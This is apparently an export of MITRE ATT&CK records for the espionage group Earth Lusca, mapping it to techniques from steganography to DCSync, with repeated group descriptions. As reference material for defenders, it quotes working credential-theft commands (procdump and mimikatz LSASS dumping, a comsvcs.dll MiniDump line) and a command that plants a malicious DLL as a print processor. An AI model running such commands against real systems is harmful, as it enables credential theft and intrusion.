Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used steganography to hide shellcode in a BMP image file.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--09f5abff-ad09-4d5b-a6c4-612d4171c089 revoked : False technique : Steganography technique_description : Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files. [Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) By the end of 2017, a threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. 
In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1027.003 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows'] data_sources : ['File: File Metadata'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--fff3195c-ef40-4e11-b0f3-f1a849b2b316 revoked : False technique : Malicious Link technique_description : An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002). 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')] technique_id : T1204.001 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows'] data_sources : ['File: File Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation'] permissions_required : ['User']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used a VBA script to execute WMI.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--85216e27-5d58-4d89-8b04-3ef50ed14f95 revoked : False technique : Windows Management Instrumentation technique_description : Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement.
(Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')] technique_id : T1047 matrix : mitre-attack platform : ['Windows'] data_sources : ['Network Traffic: Network Connection Creation', 'Process: Process Creation', 'WMI: WMI Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used Python scripts for port scanning or building reverse shells.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--6e6f9a76-23b6-4474-abc1-3d477284c220 revoked : False technique : Python technique_description : Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables. Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')] technique_id : T1059.006 matrix : mitre-attack platform : ['Linux', 'Windows', 'macOS'] data_sources : ['Process: Process Creation', 'Command: Command Execution'] permissions_required : ['Administrator', 'SYSTEM', 'root']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used WinRAR to compress stolen files into an archive prior to exfiltration.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--d0a3d891-2555-45eb-8aaf-99b86372607b revoked : False technique : Archive via Utility technique_description : Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration.
Adversaries may also use third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection')] technique_id : T1560.001 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows'] data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Creation']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used ProcDump to obtain the hashes of credentials by dumping the memory of the LSASS process.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--9d82c2c5-7d98-40dd-9171-1d605f259064 revoked : False technique : LSASS Memory technique_description : Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump:
* procdump -ma lsass.exe lsass_dump
Locally, mimikatz can be run using:
* sekurlsa::Minidump lsassdump.dmp
* sekurlsa::logonPasswords
Built-in Windows tools such as comsvcs.dll can also be used:
* rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into the LSASS process at system start.
Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')] technique_id : T1003.001 matrix : mitre-attack platform : ['Windows'] data_sources : ['Process: Process Access', 'Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Process: OS API Execution', 'Logon Session: Logon Session Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used a DCSync command with [Mimikatz](https://attack.mitre.org/software/S0002) to retrieve credentials from an exploited controller.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--14c209b9-cef8-4acf-8deb-57c03beaa64f revoked : False technique : DCSync technique_description : Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync. Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators.
The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')] technique_id : T1003.006 matrix : mitre-attack platform : ['Windows'] data_sources : ['Active Directory: Active Directory Object Access', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] permissions_required : ['Administrator']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used the Fodhelper UAC bypass technique to gain elevated privileges.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--a57c1d9d-0d2f-4206-a53f-d31ab7c53c17 revoked : False technique : Bypass User Account Control technique_description : Adversaries may bypass UAC mechanisms to elevate process privileges on a system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.
The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works) If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. 
Additional bypass methods are regularly discovered and some used in the wild, such as:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1548.002 matrix : mitre-attack platform : ['Windows'] data_sources : ['Windows Registry: Windows Registry Key Modification', 'Command: Command Execution', 'Process: Process Creation', 'Process: Process Metadata'] permissions_required : ['Administrator', 'User'] effective_permissions : ['Administrator']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command `move [file path] c:\windows\system32\spool\prtprocs\x64\spool.dll` to move and register a malicious DLL name as a Windows print processor, which eventually was loaded by the Print Spooler service.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--4feaa82b-a356-4412-be2b-daa6ea6df82c revoked : False technique : Match Legitimate Name or Location technique_description : Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous. Adversaries may also use the same icon of the file they are trying to mimic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1036.005 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows', 'Containers'] data_sources : ['File: File Metadata', 'Image: Image Metadata', 'Process: Process Metadata', 'Process: Process Creation'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command powershell “Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list - property * | findstr “Address”” to find the network information of successfully logged-in accounts to discover addresses of other machines. [Earth Lusca](https://attack.mitre.org/groups/G1006) has also used multiple scanning tools to discover other machines within the same compromised network.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--2bb7ed69-8f59-47f3-8d86-f1c1202c7629 revoked : False technique : Remote System Discovery technique_description : Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also analyze data from local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment. 
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')] technique_id : T1018 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows', 'Network'] data_sources : ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Process: Process Creation'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) employed a PowerShell script called RDPConnectionParser to read and filter the Windows event log “Microsoft-Windows-TerminalServices-RDPClient/Operational” (Event ID 1024) to obtain network information from RDP connections. [Earth Lusca](https://attack.mitre.org/groups/G1006) has also used [netstat](https://attack.mitre.org/software/S0104) from a compromised system to obtain network connection information.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--def0dc1a-1c41-44f0-a076-36fb1b98390c revoked : False technique : System Network Connections Discovery technique_description : Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. 
Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services. Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')] technique_id : T1049 matrix : mitre-attack platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Network'] data_sources : ['Process: OS API Execution', 'Process: Process Creation', 'Command: Command Execution'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. 
[Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
